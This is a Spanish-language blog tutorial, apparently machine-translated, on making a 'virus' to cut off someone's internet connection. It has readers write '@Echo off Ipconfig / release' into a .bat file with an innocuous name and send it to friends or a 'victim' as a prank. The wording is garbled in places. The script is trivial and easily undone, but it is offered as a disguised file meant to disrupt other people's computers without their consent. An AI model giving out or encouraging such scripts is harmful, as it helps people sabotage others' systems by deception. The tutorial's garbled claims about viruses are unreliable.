Cómo crear un virus para destruir la conexión a Internet de alguien


La mayoría de los usuarios que trabajan en computadoras y portátiles estarán al tanto del virus. Los virus son un tipo de programa malicioso que puede afectar sus datos y sistema operativo al ingresar a su computadora sin permiso. Por cierto, existen muchos tipos de virus, incluidos los troyanos y muchos otros. ¿Alguna vez te has preguntado cómo se fabrican estos virus? ¿O alguna vez has pensado en crear un virus, así que en este artículo hablamos sobre un virus y cómo crear un virus?

Cualquier computadora puede resultar dañada por el virus, pero hoy estamos hablando de un virus que no daña la computadora de nadie pero Internet se detiene por completo. Puede crear este virus usted mismo en 60 segundos. Hagámoslo saber.

Empecemos.

Índice de contenidos

    Cómo crear un virus para destruir la conexión a Internet de alguien

    Requerimientos.

    • Ordenador portátil
    • Debe tener un bloc de notas en su PC / computadora portátil
    • Víctima de pc / laptop
    • Auge.

    Úselo para destruir la conexión a Internet de alguien.

    crear virus

    Es un virus que no daña ninguna computadora. Este virus evitará que Internet se ejecute en su computadora solo para usted o cualquier otra persona (cualquier computadora que contenga virus).

    También puedes usar este truco para bromear con tus amigos. No importa los datos ni el sistema operativo de su computadora.

    Cómo crear VIRUS.

    crear virus con el bloc de notas

    Para hacer este virus solo debes tener 60 segundos. Primero, abra el Bloc de notas en su computadora. Ahora escriba el texto a continuación en el Bloc de notas.

    @Echo off Ipconfig / release

    Guarde este archivo en formato .bat, como internet.bat o virus.bat y envíelo a sus amigos. Esto dejará la dirección IP y no podrán usar Internet.

    Otra forma de crear virus

    También puede resolver este sencillo procedimiento. Para esto, puede escribir IPconfig / renovar dentro.

    Ultimas palabras.

    Hay más trucos que puede hacer con su bloc de notas, como cómo crear su propio software de conversión de texto a voz, etc. Gracias por leer mi artículo si lo encuentra informativo para compartir con sus amigos y por cualquier pregunta comentada a continuación. Hasta entonces adiós y sigue sonriendo.

    Contenido relacionado

    Deja una respuesta

    Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

    Subir